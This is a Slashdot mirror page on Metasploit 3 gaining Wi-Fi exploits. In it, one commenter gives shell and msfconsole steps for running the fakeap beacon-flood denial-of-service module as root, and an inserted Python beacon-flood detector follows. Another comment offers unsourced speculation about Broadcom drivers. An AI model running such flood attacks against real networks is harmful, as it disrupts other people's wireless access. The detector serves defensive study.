Slashdot Mirror


Wi-Fi Exploits Coming to Metasploit

bucksDrop writes "Eweek.com is reporting that the Metasploit Project will add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool. Metasploit 3 will integrate kernel-mode payloads to allow users to use existing user-mode payloads for both kernel and non-kernel exploits. Metasploit is collaborating with Jon 'Johnny Cache' Ellch and implementing it by wrapping the LORCON library."

3 of 50 comments

  1. Re:Math problem by Anonymous Coward · Score: 3, Informative

    For those too lazy to work it out...

    Wi-Fi = i(W-F) = 3673.7 ( 0.3) = 802.11

  2. So where is the code? Right here. by spinja · Score: 5, Informative

    Install the latest Lorcon snapshot:
    $ http://www.802.11mercenary.net/lorcon/

    Grab the latest version of metasploit 3:
    $ svn co http://metasploit.com/svn/framework3/trunk/

    Compile the Metasploit Lorcon wrapper:
    $ cd trunk/external/msflorcon
    $ make

    Plug in a supported network card (I use a WPN511 with the madwifi-old driver in Gentoo)

    Load the Metasploit Console (as root, since it needs raw WiFi access)
    # trunk/msfconsole

    Play with some of the demo modules :-)

    This is an example of sending fake beacon requests to flood the Windows Wireless Network Browser:
    msf > use auxiliary/dos/wireless/fakeap
    msf auxiliary(fakeap) > show options

    Module options:

          CHANNEL    11       yes  The default channel number
          DRIVER     madwifi  yes  The name of the wireless driver for lorcon
          INTERFACE  ath0     yes  The name of the wireless interface

    Type the "run" command, or use "set VARIABLE VALUE" to change these options.

    msf auxiliary(fakeap) > run
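
A defensive counterpart to the fakeap demo in the comment above, added here as an example (not code from the poster or the Metasploit project): it parses beacon frames as a monitor-mode capture delivers them once the radiotap header is stripped, and flags a burst of previously unseen BSSIDs. The class name, thresholds and sample frame are assumptions constructed for illustration.

```python
from collections import deque

# Constructed sample: beacon from BSSID 02:00:00:00:00:01, SSID "lab-ap", channel 11.
SAMPLE_BEACON = bytes.fromhex(
    "80000000" "ffffffffffff" "020000000001" "020000000001" "0000"  # MAC header
    "0000000000000000" "6400" "0100"                                # fixed fields
    "00066c61622d6170" "03010b"                                     # SSID, DS channel
)

def parse_beacon(frame):
    """Return (bssid, ssid) for a beacon frame, or None for anything else."""
    if len(frame) < 36 or frame[0] != 0x80:    # management type, subtype 8
        return None
    bssid = frame[16:22].hex(":")              # address 3
    pos = 36                                   # 24-byte header + 12 fixed bytes
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        body = frame[pos + 2:pos + 2 + length]
        if len(body) < length:                 # truncated element, stop parsing
            break
        if tag == 0:                           # SSID element
            return bssid, body.decode("utf-8", "replace")
        pos += 2 + length
    return bssid, ""

class BeaconFloodDetector:
    """Alert when too many previously unseen BSSIDs appear within `window` seconds."""
    def __init__(self, window=5.0, max_new_bssids=20):   # assumed thresholds
        self.window, self.max_new = window, max_new_bssids
        self.known = set()
        self.first_seen = deque()              # times at which new BSSIDs appeared

    def observe(self, ts, frame):
        parsed = parse_beacon(frame)
        if parsed is None:
            return False
        if parsed[0] not in self.known:
            self.known.add(parsed[0])
            self.first_seen.append(ts)
        while self.first_seen and ts - self.first_seen[0] > self.window:
            self.first_seen.popleft()
        return len(self.first_seen) > self.max_new

if __name__ == "__main__":
    print(parse_beacon(SAMPLE_BEACON))
```

In a long-running sensor, age out entries in `known` so memory stays bounded during a flood.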

  3. Re:This begs the question... by ehrichweiss · Score: 2, Informative

    I don't know why others might not release their drivers' source, but I know that Broadcom apparently can't do it for at least some of their wireless cards because they apparently can be tuned into some military-only frequencies and, needless to say, that's not a good thing.

    --
    0x09F911029D74E35BD84156C5635688C0